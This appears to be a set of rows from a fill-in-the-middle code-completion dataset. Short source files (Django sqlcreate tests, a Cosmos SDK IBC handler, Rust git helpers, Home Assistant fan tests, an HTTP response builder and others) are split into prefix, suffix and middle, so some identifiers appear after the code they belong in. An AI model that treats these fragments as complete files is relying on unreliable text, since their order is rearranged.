'USER': 'foo',
'PASSWORD': 'bar',
'HOST': '127.0.0.1',
'PORT': '3306',
}
SQLITE3_DATABASE_SETTINGS = {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite3',
}
POSTGRESQL_DATABASE_SETTINGS = {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'database',
'USER': 'foo',
'PASSWORD': 'bar',
'HOST': 'localhost',
'PORT': '5432',
}
class SqlcreateExceptionsTests(TestCase):
"""Test for sqlcreate exception."""
def test_should_raise_CommandError_if_database_is_unknown(self):
with self.assertRaisesRegex(CommandError, "Unknown database unknown"):
call_command('sqlcreate', '--database=unknown')
class SqlCreateTests(TestCase):
"""Tests for sqlcreate command."""
@override_settings(DATABASES={'default': MYSQL_DATABASE_SETTINGS})
@patch('sys.stderr', new_callable=StringIO)
@patch('sys.stdout', new_callable=StringIO)
@patch('django_extensions.management.commands.sqlcreate.socket')
def test_should_print_SQL_create_database_statement_for_mysql(self, m_socket, m_stdout, m_stderr):
m_socket.gethostname.return_value = 'tumbleweed'
expected_error = """-- WARNING!: https://docs.djangoproject.com/en/dev/ref/databases/#collation-settings
-- Please read this carefully! Collation will be set to utf8_bin to have case-sensitive data.
"""
expected_statement = """CREATE DATABASE dbatabase CHARACTER SET utf8 COLLATE utf8_bin;
GRANT ALL PRIVILEGES ON dbatabase.* to 'foo'@'tumbleweed' identified by 'bar';
"""
call_command('sqlcreate')
self.assertEqual(expected_statement, m_stdout.getvalue())
self.assertEqual(expected_error, m_stderr.getvalue())
@override_settings(DATABASES={'default': POSTGRESQL_DATABASE_SETTINGS})
@patch('sys.stdout', new_callable=StringIO)
def test_should_print_SQL_create_database_statement_for_postgresql(self, m_stdout):
expected_statement = """CREATE USER foo WITH ENCRYPTED PASSWORD 'bar' CREATEDB;
CREATE DATABASE database WITH ENCODING 'UTF-8' OWNER "foo";
GRANT ALL PRIVILEGES ON DATABASE database TO foo;
"""
call_command('sqlcreate')
self.assertEqual(expected_statement, m_stdout.getvalue())
@override_settings(DATABASES={'default': POSTGRESQL_DATABASE_SETTINGS})
@patch('sys.stdout', new_callable=StringIO)
def test_should_print_SQL_drop_and_create_database_statement_for_postgresql(self, m_stdout):
expected_statement = """DROP DATABASE IF EXISTS database;
DROP USER IF EXISTS foo;
CREATE USER foo WITH ENCRYPTED PASSWORD 'bar' CREATEDB;
CREATE DATABASE database WITH ENCODING 'UTF-8' OWNER "foo";
GRANT ALL PRIVILEGES ON DATABASE database TO foo;
"""
call_command('sqlcreate', '--drop')
self.assertEqual(expected_statement, m_stdout.getvalue())
@override_settings(DATABASES={'default': SQLITE3_DATABASE_SETTINGS})
@patch('sys.stderr', new_callable=StringIO)
def test_should_print_stderr_for_sqlite3(self, m_stderr):
|
@override_settings(DATABASES={
'unknown': {
'ENGINE': 'django.db.backends.unknown',
'NAME': 'database',
'USER': 'foo',
}
})
@patch('sys.stderr', new_callable=StringIO)
@patch('sys.stdout', new_callable=StringIO)
def test_should_print_stderr_and_standard_create_database_statement_for_unsupported_engine(self, m_stdout, m_stderr):
expected_error = "-- Don't know how to handle 'unknown' falling back to SQL.\n"
expected_statement = """CREATE DATABASE database;
GRANT ALL PRIVILEGES ON DATABASE database to foo;
"""
call_command('sqlcreate', '--database=unknown')
self.assertEqual(expected_error, m_stderr.getvalue())
self.assertEqual(expected_statement, m_stdout.getvalue())
| expected_error = "-- manage.py syncdb will automatically create a sqlite3 database file.\n"
call_command('sqlcreate')
self.assertEqual(expected_error, m_stderr.getvalue()) |
handler.go | package client
import (
sdk "github.com/cosmos/cosmos-sdk/types"
sdkerrors "github.com/cosmos/cosmos-sdk/types/errors"
"github.com/cosmos/cosmos-sdk/x/evidence"
evidenceexported "github.com/cosmos/cosmos-sdk/x/evidence/exported"
"github.com/cosmos/cosmos-sdk/x/ibc/02-client/exported"
"github.com/cosmos/cosmos-sdk/x/ibc/02-client/types"
ibctmtypes "github.com/cosmos/cosmos-sdk/x/ibc/07-tendermint/types"
localhosttypes "github.com/cosmos/cosmos-sdk/x/ibc/09-localhost/types"
)
// HandleMsgCreateClient defines the sdk.Handler for MsgCreateClient
func HandleMsgCreateClient(ctx sdk.Context, k Keeper, msg exported.MsgCreateClient) (*sdk.Result, error) {
clientType := exported.ClientTypeFromString(msg.GetClientType())
var clientState exported.ClientState
switch clientType {
case exported.Tendermint:
tmMsg, ok := msg.(ibctmtypes.MsgCreateClient)
if !ok {
return nil, sdkerrors.Wrap(ErrInvalidClientType, "Msg is not a Tendermint CreateClient msg")
}
var err error
clientState, err = ibctmtypes.InitializeFromMsg(tmMsg)
if err != nil {
return nil, err
}
case exported.Localhost:
// msg client id is always "localhost"
clientState = localhosttypes.NewClientState(
k.ClientStore(ctx, msg.GetClientID()),
ctx.ChainID(),
ctx.BlockHeight(),
)
default:
return nil, sdkerrors.Wrap(ErrInvalidClientType, msg.GetClientType())
}
_, err := k.CreateClient(
ctx, clientState, msg.GetConsensusState(),
)
if err != nil {
return nil, err
}
ctx.EventManager().EmitEvents(sdk.Events{
sdk.NewEvent(
EventTypeCreateClient,
sdk.NewAttribute(AttributeKeyClientID, msg.GetClientID()),
sdk.NewAttribute(AttrbuteKeyClientType, msg.GetClientType()),
),
sdk.NewEvent(
sdk.EventTypeMessage,
sdk.NewAttribute(sdk.AttributeKeyModule, AttributeValueCategory),
),
})
return &sdk.Result{
Events: ctx.EventManager().Events().ToABCIEvents(),
}, nil
}
// HandleMsgUpdateClient defines the sdk.Handler for MsgUpdateClient
func | (ctx sdk.Context, k Keeper, msg exported.MsgUpdateClient) (*sdk.Result, error) {
_, err := k.UpdateClient(ctx, msg.GetClientID(), msg.GetHeader())
if err != nil {
return nil, err
}
return &sdk.Result{
Events: ctx.EventManager().Events().ToABCIEvents(),
}, nil
}
// HandlerClientMisbehaviour defines the Evidence module handler for submitting a
// light client misbehaviour.
func HandlerClientMisbehaviour(k Keeper) evidence.Handler {
return func(ctx sdk.Context, evidence evidenceexported.Evidence) error {
misbehaviour, ok := evidence.(exported.Misbehaviour)
if !ok {
return types.ErrInvalidEvidence
}
return k.CheckMisbehaviourAndUpdateState(ctx, misbehaviour)
}
}
| HandleMsgUpdateClient |
git.rs | use std::process::Command;
use std::str;
use std::vec::IntoIter;
pub fn list_branches(directory: Option<&String>) -> IntoIter<String> {
let output = Command::new("git")
.current_dir(directory.unwrap())
.arg("branch")
.arg("--format=%(refname:short)")
.output()
.expect("failed to execute process");
let lines = output.stdout
.iter()
.map(|&c| c as char)
.collect::<String>();
let debug: Vec<String> = lines
.split("\n")
.map(|c| c.trim())
.filter(|&c| c != "")
.map(|c| c.to_string())
.collect();
debug.into_iter()
}
pub fn delete_branch(directory: Option<&String>, branch: Option<&str>) | {
println!("Directory is {} and branch is {}", directory.unwrap(), branch.unwrap());
let output = Command::new("git")
.current_dir(directory.unwrap())
.arg("branch")
.arg("-D")
.arg(branch.unwrap())
.output()
.expect("failed to execute process");
println!("{:?}", output.stdout.iter().map(|&c| c as char).collect::<String>());
println!("{:?}", output.stderr.iter().map(|&c| c as char).collect::<String>());
} |
|
BillDingBizOrderSum.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class BillDingBizOrderSum(object):
def __init__(self):
self._biz_date = None
self._expenses = None
self._income = None
@property
def biz_date(self):
return self._biz_date
@biz_date.setter
def biz_date(self, value):
self._biz_date = value
@property
def expenses(self):
return self._expenses
@expenses.setter
def expenses(self, value):
self._expenses = value
@property
def income(self):
return self._income
@income.setter
def income(self, value):
self._income = value
def to_alipay_dict(self):
params = dict()
if self.biz_date:
if hasattr(self.biz_date, 'to_alipay_dict'):
params['biz_date'] = self.biz_date.to_alipay_dict()
else:
params['biz_date'] = self.biz_date
if self.expenses:
if hasattr(self.expenses, 'to_alipay_dict'):
params['expenses'] = self.expenses.to_alipay_dict()
else:
params['expenses'] = self.expenses
if self.income:
if hasattr(self.income, 'to_alipay_dict'):
params['income'] = self.income.to_alipay_dict()
else:
params['income'] = self.income
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = BillDingBizOrderSum()
if 'biz_date' in d:
o.biz_date = d['biz_date']
if 'expenses' in d:
o.expenses = d['expenses']
if 'income' in d:
|
return o
| o.income = d['income'] |
styles.ts | import styled from 'styled-components';
interface ProgressProps {
total: number;
current: number;
}
export const Container = styled.main`
width: 100%;
margin: 0 auto;
padding: 30px;
> header {
display: flex;
justify-content: space-between;
align-items: center;
margin-bottom: 15px;
}
`;
export const ProgressBar = styled.div<ProgressProps>`
height: 20px;
width: 100%;
border-radius: 4px;
background: #999;
position: relative;
display: flex;
align-items: center;
justify-content: center;
span {
font-size: 13px;
line-height: 21px;
z-index: 5;
color: #fff;
font-weight: bold;
}
&::before {
content: '';
width: ${props => (props.current * 100) / props.total}%;
max-width: 100%;
height: 100%;
border-radius: 4px;
position: absolute;
left: 0;
top: 0;
background: #ff79c6; | }
`; |
|
model_show_load_balancer_response.go | /*
* ELB
*
* No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
*
*/
package model
import (
"encoding/json"
"strings"
)
// Response Object
type ShowLoadBalancerResponse struct {
// 请求ID。 注:自动生成 。
RequestId *string `json:"request_id,omitempty"`
Loadbalancer *LoadBalancer `json:"loadbalancer,omitempty"`
}
func (o ShowLoadBalancerResponse) String() string {
data, _ := json.Marshal(o)
return strings.Join([]string{"ShowLoadBalancerResponse", string(data)}, " ") | } |
|
list.py | from django.shortcuts import render
def get_list(req):
return render(req, 'kwue/food.html', {})
def add_item(req):
|
def create_list(req):
return render(req, 'kwue/food.html', {})
| return render(req, 'kwue/food.html', {}) |
lib.rs | extern crate proc_macro;
use proc_macro::TokenStream;
use proc_macro2::Span;
use quote::quote;
use quote::ToTokens;
use syn::parse_macro_input;
use syn::visit_mut::VisitMut;
use syn::{spanned::Spanned, Arm, Error, ExprMatch, Ident, Item, ItemFn, Pat, Path, Result};
fn check_enum(ast: &Item) -> Result<()> {
match ast {
Item::Enum(enum_ast) => {
let mut prev = None;
for v in enum_ast.variants.iter() {
if let Some(ident_prev) = prev {
if &v.ident < ident_prev {
// re-iter the variants to find the proper location
for var in enum_ast.variants.iter() {
if var.ident > v.ident {
let error = Error::new(
v.ident.span(),
format!("{} should sort before {}", v.ident, var.ident),
);
return Err(error);
}
}
}
}
prev = Some(&v.ident);
}
Ok(())
}
_ => Err(Error::new(
Span::call_site(),
"expected enum or match expression",
)),
}
}
fn | <'a, Iter: Iterator<Item = &'a Pat> + Clone>(pat_iter: Iter) -> Result<()> {
let mut path_prev = None;
let mut ident_prev = None;
for pat in pat_iter.clone() {
if let Some(prev) = path_prev {
let cur_path = check_and_get_pat_path(pat)?;
if gt(prev, cur_path) {
for p in pat_iter.clone() {
let path = check_and_get_pat_path(p)?;
if gt(path, cur_path) {
return Err(Error::new(
cur_path.span(),
format!(
"{} should sort before {}",
fmt_path(cur_path),
fmt_path(path)
),
));
}
}
}
path_prev = Some(cur_path);
ident_prev = None;
} else if let Some(prev) = ident_prev {
let ident = check_and_get_pat_ident(pat)?;
if prev > ident {
return Err(Error::new(
ident.span(),
format!("{} should sort before {}", ident, prev),
));
}
ident_prev = Some(ident);
path_prev = None;
} else {
assert!(ident_prev.is_none() && path_prev.is_none());
if let Pat::Ident(i) = pat {
ident_prev = Some(&i.ident);
} else {
let path = check_and_get_pat_path(pat)?;
match path.get_ident() {
Some(i) => ident_prev = Some(i),
None => path_prev = Some(path),
}
}
}
}
Ok(())
}
fn fmt_path(p: &Path) -> String {
p.to_token_stream().to_string().replace(" ", "")
}
fn gt(p1: &Path, p2: &Path) -> bool {
for (s1, s2) in p1.segments.iter().zip(p2.segments.iter()) {
if s1.ident > s2.ident {
return true;
}
}
p1.segments.len() > p2.segments.len()
}
fn check_and_get_pat_path(pat: &Pat) -> Result<&Path> {
match pat {
Pat::Path(p) => Ok(&p.path),
Pat::Or(o) => {
check_pat_match(o.cases.iter())?;
check_and_get_pat_path(o.cases.first().unwrap())
}
Pat::Reference(r) => check_and_get_pat_path(r.pat.as_ref()),
Pat::Struct(s) => Ok(&s.path),
Pat::TupleStruct(t) => Ok(&t.path),
pat => Err(Error::new(
pat.span().unwrap().into(),
"unsupported by #[sorted]",
)),
}
}
fn check_and_get_pat_ident(pat: &Pat) -> Result<&Ident> {
match pat {
Pat::Ident(i) => Ok(&i.ident),
p => {
let path = check_and_get_pat_path(p)?;
match path.get_ident() {
Some(i) => Ok(i),
None => unimplemented!(),
}
}
}
}
fn check_pat(mut arms: &[Arm]) -> Result<()> {
if !arms.is_empty() {
let len = arms.len();
if let Pat::Wild(_) = arms[len - 1].pat {
arms = &arms[..len - 1];
}
check_pat_match(arms.iter().map(|a| &a.pat))
} else {
Ok(())
}
}
struct CheckVisitor {
result: Result<()>,
}
impl CheckVisitor {
fn new() -> Self {
CheckVisitor { result: Ok(()) }
}
}
impl VisitMut for CheckVisitor {
fn visit_expr_match_mut(&mut self, i: &mut ExprMatch) {
let check_idx = i
.attrs
.iter()
.enumerate()
.filter_map(|(idx, attr)| {
if attr.path.segments.len() == 1
&& attr.path.segments.first().unwrap().ident == "sorted"
{
Some(idx)
} else {
None
}
})
.next();
if let Some(idx) = check_idx {
i.attrs.remove(idx);
self.result = check_pat(&i.arms);
}
}
}
#[proc_macro_attribute]
pub fn sorted(args: TokenStream, input: TokenStream) -> TokenStream {
let _ = args;
let ast = parse_macro_input!(input as Item);
let error = match check_enum(&ast) {
Err(e) => Some(e.to_compile_error()),
_ => None,
};
(quote! {
#ast
#error
})
.into()
}
#[proc_macro_attribute]
pub fn check(args: TokenStream, input: TokenStream) -> TokenStream {
let _ = args;
let mut ast = parse_macro_input!(input as ItemFn);
let mut visitor = CheckVisitor::new();
visitor.visit_item_fn_mut(&mut ast);
let error = match visitor.result {
Err(e) => Some(e.to_compile_error()),
_ => None,
};
(quote! {
#ast
#error
})
.into()
}
| check_pat_match |
test_fan.py | """Tests for the Bond fan device."""
from datetime import timedelta
from typing import Optional
from bond_api import Action, DeviceType, Direction
from homeassistant import core
from homeassistant.components import fan
from homeassistant.components.fan import (
ATTR_DIRECTION,
ATTR_SPEED_LIST,
DIRECTION_FORWARD,
DIRECTION_REVERSE,
DOMAIN as FAN_DOMAIN,
SERVICE_SET_DIRECTION,
)
from homeassistant.const import ATTR_ENTITY_ID, SERVICE_TURN_OFF, SERVICE_TURN_ON
from homeassistant.helpers.entity_registry import EntityRegistry
from homeassistant.util import utcnow
from .common import patch_bond_action, patch_bond_device_state, setup_platform
from tests.common import async_fire_time_changed
def ceiling_fan(name: str):
"""Create a ceiling fan with given name."""
return {
"name": name,
"type": DeviceType.CEILING_FAN,
"actions": ["SetSpeed", "SetDirection"],
}
async def turn_fan_on(
hass: core.HomeAssistant, fan_id: str, speed: Optional[str] = None
) -> None:
"""Turn the fan on at the specified speed."""
service_data = {ATTR_ENTITY_ID: fan_id}
if speed:
service_data[fan.ATTR_SPEED] = speed
await hass.services.async_call(
FAN_DOMAIN, SERVICE_TURN_ON, service_data=service_data, blocking=True,
)
await hass.async_block_till_done()
async def test_entity_registry(hass: core.HomeAssistant):
"""Tests that the devices are registered in the entity registry."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
registry: EntityRegistry = await hass.helpers.entity_registry.async_get_registry()
assert [key for key in registry.entities] == ["fan.name_1"]
async def test_non_standard_speed_list(hass: core.HomeAssistant):
"""Tests that the device is registered with custom speed list if number of supported speeds differs form 3."""
await setup_platform(
hass,
FAN_DOMAIN,
ceiling_fan("name-1"),
bond_device_id="test-device-id",
props={"max_speed": 6},
)
actual_speeds = hass.states.get("fan.name_1").attributes[ATTR_SPEED_LIST]
assert actual_speeds == [
fan.SPEED_OFF,
fan.SPEED_LOW,
fan.SPEED_MEDIUM,
fan.SPEED_HIGH,
]
with patch_bond_device_state():
with patch_bond_action() as mock_set_speed_low:
await turn_fan_on(hass, "fan.name_1", fan.SPEED_LOW)
mock_set_speed_low.assert_called_once_with(
"test-device-id", Action.set_speed(1)
)
with patch_bond_action() as mock_set_speed_medium:
await turn_fan_on(hass, "fan.name_1", fan.SPEED_MEDIUM)
mock_set_speed_medium.assert_called_once_with(
"test-device-id", Action.set_speed(3)
)
with patch_bond_action() as mock_set_speed_high:
await turn_fan_on(hass, "fan.name_1", fan.SPEED_HIGH)
mock_set_speed_high.assert_called_once_with(
"test-device-id", Action.set_speed(6)
)
async def test_turn_on_fan_with_speed(hass: core.HomeAssistant):
"""Tests that turn on command delegates to set speed API."""
await setup_platform(
hass, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_action() as mock_set_speed, patch_bond_device_state():
await turn_fan_on(hass, "fan.name_1", fan.SPEED_LOW)
mock_set_speed.assert_called_with("test-device-id", Action.set_speed(1))
async def | (hass: core.HomeAssistant):
"""Tests that turn on command delegates to turn on API."""
await setup_platform(
hass, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_action() as mock_turn_on, patch_bond_device_state():
await turn_fan_on(hass, "fan.name_1")
mock_turn_on.assert_called_with("test-device-id", Action.turn_on())
async def test_turn_off_fan(hass: core.HomeAssistant):
"""Tests that turn off command delegates to API."""
await setup_platform(
hass, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_action() as mock_turn_off, patch_bond_device_state():
await hass.services.async_call(
FAN_DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: "fan.name_1"}, blocking=True,
)
await hass.async_block_till_done()
mock_turn_off.assert_called_once_with("test-device-id", Action.turn_off())
async def test_update_reports_fan_on(hass: core.HomeAssistant):
"""Tests that update command sets correct state when Bond API reports fan power is on."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(hass, utcnow() + timedelta(seconds=30))
await hass.async_block_till_done()
assert hass.states.get("fan.name_1").state == "on"
async def test_update_reports_fan_off(hass: core.HomeAssistant):
"""Tests that update command sets correct state when Bond API reports fan power is off."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
with patch_bond_device_state(return_value={"power": 0, "speed": 1}):
async_fire_time_changed(hass, utcnow() + timedelta(seconds=30))
await hass.async_block_till_done()
assert hass.states.get("fan.name_1").state == "off"
async def test_update_reports_direction_forward(hass: core.HomeAssistant):
"""Tests that update command sets correct direction when Bond API reports fan direction is forward."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
with patch_bond_device_state(return_value={"direction": Direction.FORWARD}):
async_fire_time_changed(hass, utcnow() + timedelta(seconds=30))
await hass.async_block_till_done()
assert hass.states.get("fan.name_1").attributes[ATTR_DIRECTION] == DIRECTION_FORWARD
async def test_update_reports_direction_reverse(hass: core.HomeAssistant):
"""Tests that update command sets correct direction when Bond API reports fan direction is reverse."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
with patch_bond_device_state(return_value={"direction": Direction.REVERSE}):
async_fire_time_changed(hass, utcnow() + timedelta(seconds=30))
await hass.async_block_till_done()
assert hass.states.get("fan.name_1").attributes[ATTR_DIRECTION] == DIRECTION_REVERSE
async def test_set_fan_direction(hass: core.HomeAssistant):
"""Tests that set direction command delegates to API."""
await setup_platform(
hass, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_action() as mock_set_direction, patch_bond_device_state():
await hass.services.async_call(
FAN_DOMAIN,
SERVICE_SET_DIRECTION,
{ATTR_ENTITY_ID: "fan.name_1", ATTR_DIRECTION: DIRECTION_FORWARD},
blocking=True,
)
await hass.async_block_till_done()
mock_set_direction.assert_called_once_with(
"test-device-id", Action.set_direction(Direction.FORWARD)
)
| test_turn_on_fan_without_speed |
transition.rs | use crate::{arc, Marking, PlaceId, TransitionId};
/// Transition with only production and consumption
#[derive(Default, Debug, Clone)]
pub struct Transition {
/// Identifier of the transition
pub(crate) id: TransitionId,
/// Label of the transition
pub label: Option<String>,
/// Consumption of the transition
pub consume: Marking<PlaceId>,
/// Production of the transition
pub produce: Marking<PlaceId>,
/// This transition is disconnected from the network and only kept to avoid index problems
pub deleted: bool,
}
impl Transition {
/// Return the id of the transition
#[must_use]
pub fn id(&self) -> TransitionId {
self.id
}
/// Returns [`true`] if this transition is disconnected from the network
#[must_use] | self.consume.is_empty() && self.produce.is_empty()
}
/// Get all arcs of this transition
#[must_use]
pub fn get_arcs(&self) -> Vec<arc::Kind> {
let mut arcs = vec![];
for &(pl, w) in self.consume.iter() {
arcs.push(arc::Kind::Consume(pl, self.id, w))
}
for &(pl, w) in self.produce.iter() {
arcs.push(arc::Kind::Produce(pl, self.id, w))
}
arcs
}
} | pub fn is_disconnected(&self) -> bool { |
http_response.rs | use std::collections::HashMap;
use chrono::{DateTime, Utc};
use crate::http_request::*;
use crate::method;
use crate::status;
#[derive(Clone, Debug)]
pub struct Response {
pub version: Version,
pub status: status::Code,
pub host: &'static str,
pub path: String,
pub header: HashMap<String, String>,
pub modified_datetime: Option<DateTime<Utc>>,
pub entity_body: Vec<u8>,
}
pub fn new() -> Response {
Response {
version: Version::V0_9,
status: status::OK,
host: "",
path: String::new(),
header: HashMap::new(),
modified_datetime: None,
entity_body: Vec::new(),
}
}
impl Response {
pub fn add_header(&mut self, name: &str, value: String) {
self.header.insert(name.to_string(), value);
}
fn status_line(&self) -> String {
// Status-Line = HTTP-Version SP Status-Code SP Reason-Phrase CRLF
// "HTTP/" 1*DIGIT "." 1*DIGIT SP 3DIGIT SP
format!(
"HTTP/{} {}\r\n",
self.version.to_string(),
status::to_string(self.status)
)
}
#[allow(dead_code)]
pub fn set_location(&mut self, status: status::Code3, absolute_uri: String) {
// Location = "Location" ":" absoluteURI
self.status = status;
self.header.insert("Location".to_string(), absolute_uri);
}
#[allow(dead_code)]
pub fn set_extention_status(&mut self, id: isize, phrase: &'static str) {
self.status = (id, phrase);
}
#[allow(dead_code)]
pub fn allow(&mut self, m: method::Method) {
let value = match self.header.get("Allow") {
Some(s) => format!("{}, {}", s, m),
None => m.to_string(),
};
self.header.insert("Allow".to_string(), value);
}
pub fn | (&mut self, ip_port: String) {
self.header.insert("HOST".to_string(), ip_port);
}
pub fn set_server(&mut self, name: String) {
// Server = "Server" ":" 1*( product | comment )
self.header.insert("Server".to_string(), name);
}
// TODO WWW-Authenticate
pub fn to_bytes(&self) -> Vec<u8> {
let mut ret = Vec::new();
// Status-Line
ret.append(&mut Vec::from(self.status_line().as_bytes()));
// Header
for (k, v) in &self.header {
ret.append(&mut Vec::from(format!("{}: {}\r\n", k, v).as_bytes()));
}
ret.append(&mut Vec::from("\r\n".as_bytes()));
ret.append(&mut self.entity_body.clone());
return ret;
}
}
| set_host |
vacinaValidator.ts | import { body, validationResult } from "express-validator";
import { validarCPF } from "./cpfValidator";
import vacinaServico from "../services/vacinaService";
function | () {
return [
body("cpf")
.isLength({ min: 11, max: 11 })
.withMessage("Tamanho deve ser de 11 caracteres"),
body("cpf").notEmpty().withMessage("CPF obrigatório!!"),
body("nome").notEmpty().withMessage("Nome obrigatório!!"),
body("nome")
.isLength({ min: 5, max: 100 })
.withMessage("Mínimo 5 caracteres e Máximo 100 caracteres"),
body("flTomou")
.notEmpty()
.withMessage("Obrigatório inserir se tomou ou não a vacina!!"),
body("cpf").notEmpty().withMessage("CPF obrigatório"),
body("cpf")
.custom((value: any) => {
if (!validarCPF(value)) throw new Error("CPF é inválido!");
return true;
})
.withMessage("Cpf inválido"),
body("cpf").custom(async (value: any) => {
const resultadoVacina = await vacinaServico.buscaSolicitacaoPorCpf(value);
if (resultadoVacina != null) {
throw new Error("CPF já existe, cadastro não permitido!");
}
return true;
}),
];
};
export {
VacinaValidationRules
};
| VacinaValidationRules |
error.go | package silence
import (
"github.com/giantswarm/microerror"
)
| Kind: "invalidConfigError",
}
// IsInvalidConfig asserts invalidConfigError.
func IsInvalidConfig(err error) bool {
return microerror.Cause(err) == invalidConfigError
} | var invalidConfigError = µerror.Error{ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.